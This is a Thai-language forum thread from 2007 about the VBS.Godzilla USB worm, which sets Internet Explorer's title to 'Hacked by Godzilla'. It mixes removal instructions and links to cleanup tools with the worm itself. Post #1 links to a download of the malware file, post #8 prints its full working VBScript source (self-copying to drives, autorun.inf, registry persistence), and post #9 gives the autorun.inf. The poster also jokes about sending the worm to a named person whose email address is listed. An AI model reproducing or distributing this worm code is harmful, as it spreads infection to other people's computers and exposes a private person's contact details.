overclockzonefanpage  overclockzoneth  TV  RSS  


Results 1 to 15 of 15

Thread: Hacked by Godzilla

  1. #1
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default Hacked by Godzilla

    Hacked by Godzilla





    http://rapidshare.com/files/40053527/MS32DLL.dll.vbs

    อาการ : ที่ไตเติ้ลบาร์ของ IE จะมีคำว่า Hacked by Godzilla อยู่ มีการเปลี่ยน Menu คลิ๊กขวาที่ไดร์ฟต่างๆใน Windows Explorer ให้เป็น Autoplay และไม่สามารถ douvle cliclk Drive ต่างๆได้ เมื่อ double click จะมีการสร้างไฟล์ระบบการทำงาน wscrip ขึ้นมา
    ที่มา : สามารถติดจากธัมป์ไดร์ฟ แต่เนื่องจากที่ title บาร์ ของ IE มีคำว่า Hacked by Godzilla ทำให้เข้าใจผิดว่าติดมาจาก internet
    วิธีแก้ไข : สามารถทำได้ 2 วิธีด้วยกันครับ คือ แก้ไขเอง กับใช้โปรแกรม
    วิธีแก้ไขเอง ทำดังนี้ครับ
    1.Double Click ไอคอน My Computer ที่ Desktop เลือกเมนู Tools --> Folder Options
    2.ปรากฏไดอะล็อก Folder Options คลิกแท็บ View
    1)คลิกเลือก Show Hidden files and folders
    2)เอาเครื่องหมาย / ในช่องสี่เหลี่ยมหน้า Hide extention… และ Hide protected operating system file ออก
    3)คลิก OK

    3.กดปุ่ม Ctrl+Alt+Delete ที่คีย์บอร์ด
    4.ปรากฏไดอะล็อกบ็อก Windows Task Manager คลิกเลือกแท็บ Processes
    1)คลิกเลือกเมนู Image Name (เพื่อ sort File)
    2)คลิกเลือกไฟล์ wscript.exe ( ทีละตัว )
    3)คลิกปุ่ม End Process

    5.เปิดไดร์ฟ ( โดยคลิกเม้าส์ขวาเลือก Explore ห้าม Double Click ไดร์ฟ ) ทำการลบไฟล์ autorun.inf และ MS32DLL.dll.vbs ออก (โดยกด Shift+Delete ) ทุกไดร์ฟที่มีอยู่ในเครื่องคอมพิวเตอร์ซึ่งรวมท ั้ง Handy Drive และ Floppy disk ด้วย

    6.เปิดโฟลเดอร์ C:\WINDOWS เพื่อลบไฟล์ MS32DLL.dll.vbs ออก (โดยกด Shift+Delete )

    7.ไปที่ปุ่ม Start-->Run ปรากฏไดอะล็อกบ็อก Run พิมพ์คำสั่ง regedit กดปุ่ม OK
    ปรากฏไดอะล็อกบ็อก Registry Edit

    8.คลิกเลือก HKEY_LOCAL_MACHINE --> Software -->Microsoft -->Windows --> Current Version --> Run เพื่อลบไฟล์ MS32DLL (โดยการกดปุ่ม Delete ที่คีย์บอร์ด )

    9.คลิกเลือก HKEY_CURRENT_USER --> Software --> Microsoft --> Internet Explorer --> Main เพื่อลบไฟล์ที่ Window Title “Hacked by Godzilla” ออก (โดยการกดปุ่ม Delete ที่คีย์บอร์ด )

    10.คลิกปุ่ม Start --> Run ปรากฏไดอะล็อกบ็อก Run พิมพ์คำสั่ง gpedit.msc กดปุ่ม OK
    ปรากฏไดอะล็อกบ็อก Group Policy
    11.คลิกเลือก User Configuration --> Administrative Templates --> System --> Double Click ไฟล์ Turn Off Autoplay ปรากกฎไดอะล็อกบ็อก Turn Off Autoplay Properties
    1)คลิกเลือก Enabled
    2)คลิกเลือก All drives
    3)คลิก OK
    เพื่อป้องกันการเปิดไดร์ฟอัตโนมัติในกรณีที่นำแผ่นซี ดี หรือ Handy Drive มาใช้งานซึ่งเป็นช่องทางที่จะทำให้เกิดการติดไวรัสได ้ง่ายขึ้น

    12.คลิกปุ่ม Start --> Run ปรากฏไดอะล็อกบ็อก Run พิมพ์คำสั่ง msconfig กดปุ่ม OK
    ปรากฏไดอะล็อกบ็อก System Configuration Utility คลิกแท็บ Startup
    1)เอาเครื่องหมาย / ในช่องสี่เหลี่ยมหน้าไฟล์ MS32DLL ออก
    2)คลิกปุ่ม Apply
    3)คลิกปุ่ม OK (หรือ Close)
    จะปรากฏไดอะล็อกบ็อก System Configuration เลือก Exit Without Restart

    13.Double Click ไอคอน Mycomputer ที่ Desktop เลือกเมนู Tools --> Folder Options
    14.ปรากฏไดอะล็อก Folder Options คลิกแท็บ View
    1)คลิก / ในช่องสี่เหลี่ยมหน้า Hide extention… และ Hide protected operating system file (หรือจะใช้ Restore Default ในส่วนของ View ก็ได้ครับ)
    2)คลิก OK

    15. Click เม้าส์ขวาที่ไอคอน Recycle bin เพื่อเรียก Shortcut Menu เลือกคำสั่ง Empty Recycle bin เพื่อยืนยันการลบไฟล์ไวรัสออกจากเครื่องคอมพิวเตอร์อ ีกครั้ง

    วิธีใช้โปแกรม

    ก็เข้าไปโหลดไฟล์แก้ที่ลิงค์ข้างล่างนี้ครับ
    http://data.thammai.com/bank/Anti_Ha...y_Godzilla.zip (ตัวเก่า)

    http://data.thammai.com/bank/KillGodzilla3.rar (เวอร์ชั่น 3)
    *** ในเครื่อง ต้องมีโปรแกรม WinRAR ติดตั้งไว้ด้วยนะครับ จึงจะเปิดใช้งานได้ ***

    ตัวแก้ล่าสุดที่ครอบคลุมกว่า และค่อนข้างจะกำจัดได้ดีกว่า โหลดที่นี่เลยครับ...
    KillGodzilla4 http://data.thammai.com/bank/KillGodzilla4.zip

    บางเครื่องอาจพบปัญหาไฟล์ MSCOMCTL.OCX error ก็สามารถดาวน์โหลดจากลิงค์นี้ไปใช้ได้เลยครับ
    http://data.thammai.com/bank/MSCOMCTL.OCX

    ตัวนี้เป็นของ NOD32 VBS Godzilla+Moozilla[Butsur.A,B] ครับ
    http://data.thammai.com/bank/NOD32_VBS[Butsur.A,B]-Fix.exe

    --------------------------------------------------------------------------------

  2. #2
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    Hacked by Godzilla ชอบมากจริงๆ จะส่งให้ Janny ด้วย ถ้าไม่ชอบหา KillGodzilla มากำจัดตามลิงค์ข้างล่างนี้ครับ

    http://data.thammai.com/bank/Anti_Ha...y_Godzilla.zip (ตัวเก่า)

    http://data.thammai.com/bank/KillGodzilla3.rar (เวอร์ชั่น 3)
    *** ในเครื่อง ต้องมีโปรแกรม WinRAR ติดตั้งไว้ด้วยนะครับ จึงจะเปิดใช้งานได้ ***

    ตัวแก้ล่าสุดที่ครอบคลุมกว่า และค่อนข้างจะกำจัดได้ดีกว่า โหลดที่นี่เลยครับ...
    KillGodzilla4 http://data.thammai.com/bank/KillGodzilla4.zip

    บางเครื่องอาจพบปัญหาไฟล์ MSCOMCTL.OCX error ก็สามารถดาวน์โหลดจากลิงค์นี้ไปใช้ได้เลยครับ
    http://data.thammai.com/bank/MSCOMCTL.OCX

    ตัวนี้เป็นของ NOD32 VBS Godzilla+Moozilla[Butsur.A,B] ครับ
    http://data.thammai.com/bank/NOD32_VBS[Butsur.A,B]-Fix.exe

    Janny E-Mail = laziiw_nable@hotmail.com
    Last edited by nuttapum_plum; 1 Jul 2007 at 17:24:46.

  3. #3
    OverclockZone Member hellods's Avatar
    Join Date
    22 May 2007
    Location
    http:/www.facebook.com/bccneer

    Default



    ผมชอบ KillGodzilla ครับ ตอนนี้ออกเวอร์ชั่น 5 สุดยอดมั่กๆ

  4. #4
    OverclockZone Member dears's Avatar
    Join Date
    6 Nov 2006
    Location
    Royal Thai Army

    Default

    Quote Originally Posted by hellods View Post
    ผมชอบ KillGodzilla ครับ ตอนนี้ออกเวอร์ชั่น 5 สุดยอดมั่กๆ
    เรื่องเดียวกันอ่ะเปล่าเนี่ยะ

  5. #5
    เมพขิงๆ Mania ! TWK.'s Avatar
    Join Date
    5 Dec 2006
    Location
    ทริป เหมืองปิล๊อก (กาญจนบุรี)

    Default

    ^^"

  6. #6
    OverclockZone Member hellods's Avatar
    Join Date
    22 May 2007
    Location
    http:/www.facebook.com/bccneer

    Default

    ฆ่าก๊อตซิลล่าโลด 555+ หารูปโปรแกรมไม่เจอหงะ

  7. #7
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    Hacked by Godzilla
    ชื่อ VBS.Godzilla
    วันเกิด 21 พฤศจิกายน 2549
    อาชีพ Hacker
    ที่อยู่ Local Disk , Internet Explorer , Thumb Drive
    เบอร์โทรศัพท์ ไม่มี
    E-Mail ไม่มี
    ความสามารถ เจาะเว็บไซต์ในโปรแกรม Internet Explorer
    มรณะ KillGodzilla , Antivirus
    คำเตือน คอมพิวเตอร์ต้องไม่มี Antivirus ถ้ามี Antivirus Hacked by Godzilla ก็มรณะเช่นกัน
    Last edited by nuttapum_plum; 18 Aug 2007 at 13:06:06.

  8. #8
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    Source Code

    'My name is Slow but sure V0.04
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    end if
    next
    set rg = createobject("WScript.Shell")
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check<>1
    set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

  9. #9
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    Autorun

    [autorun]
    shellexecute=wscript.exe MS32DLL.dll.vbs

  10. #10
    OverclockZone Member
    Join Date
    7 Aug 2007

    Default

    Quote Originally Posted by hellods View Post


    ผมชอบ KillGodzilla ครับ ตอนนี้ออกเวอร์ชั่น 5 สุดยอดมั่กๆ
    ผมขอมั่งดิท่าน..ขอบคุณครับ....ตอนี้ใช้ Autorun Killer+Killgozilla 2ตัว

  11. #11
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    แฮกเกล็ต บาย ก็อตซิลล่า (Hacked by Godzilla)
    เต้นเร็ว เต้นเร็ว เอา Thumb Drive มาเสียบ แล้วเปิด Internet Explorer จะมีคำว่า Hacked by Godzilla และไดร์ฟต่างๆใน Windows Explorer มี AutoPlay
    คำเตือน คอมพิวเตอร์ต้องไม่มี Antivirus
    Last edited by nuttapum_plum; 21 Aug 2007 at 20:13:40.

  12. #12
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    เรื่องของ Hacked by Godzilla

    สวัสดีครับ วันนี้จะมาเล่าเรื่องของ สคริปตัวป่วน ที่บางคนเรียกว่าไวรัสบ้าง สปายแวร์บ้าง

    แต่อันที่จริงแล้วเจ้าตัวนี้ก้อไม่ได้สร้างความเสียหายอะไรให้กับเครื่องคอมพิวเตอร์ของคุณเลย

    อาจจะสร้างความรำคาญนิดหน่อย

    โดยการทำงานของมัน ก้อแค่ ก๊อบปี้โค้ดของตัวมันเอง ลงในไดร์ฟต่างๆ 1 ไฟล์ และ สร้าง autorun.inf อีก 1 ไฟล์ รวม 2 ไฟล์ และ เขียนรีจีสทรี อีก 2 คีย์ 1 คีย์เพื่อให้มีการรันตัวสคริปต์ ทุกครั้งที่เปิดเครื่อง อีก 1 คีย์เพื่อ เปลี่ยน ไตเติลบาร์ ของโปรแกรม Internet Explorer เป็นคำว่า Hacked by Godzilla ใครโดนก้ออย่าเพิ่งตกใจครับ

    เวลาเปิดไดร์ฟต่างๆก้อให้คลิกขวาเลือก Open ไม่งั้นมันจะไม่เข้าไปยังไดร์ฟ แต่จะเป็นการสั่งให้สคริปต์ตัวนี้ทำงานแทน

    แล้วว่างๆ จะเขียนวิธีลบอย่างละเอียดๆๆๆ...โดยไม่ต้องอาศัยโปรแกรมสแกนไวรัสเลยหล่ะ

  13. #13
    OverclockZone Member hellods's Avatar
    Join Date
    22 May 2007
    Location
    http:/www.facebook.com/bccneer

    Default

    Hacked by Godzilla

    http://rapidshare.com/files/46073038/KillGodzilla5.zip

    หายห่วง

  14. #14
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    แฮกเกล็ต บาย ก็อตซิลล่า (Hacked by Godzilla)

    เรื่องของ แฮกเกล็ต บาย ก็อตซิลล่า (Hacked by Godzilla)
    สวัสดีครับ วันนี้จะมาเล่าเรื่องของ สคริปตัวป่วน ที่บางคนเรียกว่าไวรัสบ้าง สปายแวร์บ้าง

    แต่อันที่จริงแล้วเจ้าตัวนี้ก้อไม่ได้สร้างความเสียหายอะไรให้กับเครื่องคอมพิวเตอร์ของคุณเลย

    อาจจะสร้างความรำคาญนิดหน่อย

    โดยการทำงานของมัน ก้อแค่ ก๊อบปี้โค้ดของตัวมันเอง ลงในไดร์ฟต่างๆ 1 ไฟล์ และ สร้าง autorun.inf อีก 1 ไฟล์ รวม 2 ไฟล์ และ เขียนรีจีสทรี อีก 2 คีย์ 1 คีย์เพื่อให้มีการรันตัวสคริปต์ ทุกครั้งที่เปิดเครื่อง อีก 1 คีย์เพื่อ เปลี่ยน ไตเติลบาร์ ของโปรแกรม Internet Explorer เป็นคำว่า Hacked by Godzilla ใครโดนก้ออย่าเพิ่งตกใจครับ

    เวลาเปิดไดร์ฟต่างๆก้อให้คลิกขวาเลือก Open ไม่งั้นมันจะไม่เข้าไปยังไดร์ฟ แต่จะเป็นการสั่งให้สคริปต์ตัวนี้ทำงานแทน

    แล้วว่างๆ จะเขียนวิธีลบอย่างละเอียดๆๆๆ...โดยไม่ต้องอาศัยโปรแกรมสแกนไวรัสเลยหล่ะ

  15. #15
    OverclockZone Member nuttapum_plum's Avatar
    Join Date
    5 Jun 2007

    Default

    Last edited by nuttapum_plum; 28 Aug 2007 at 21:43:00.



Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •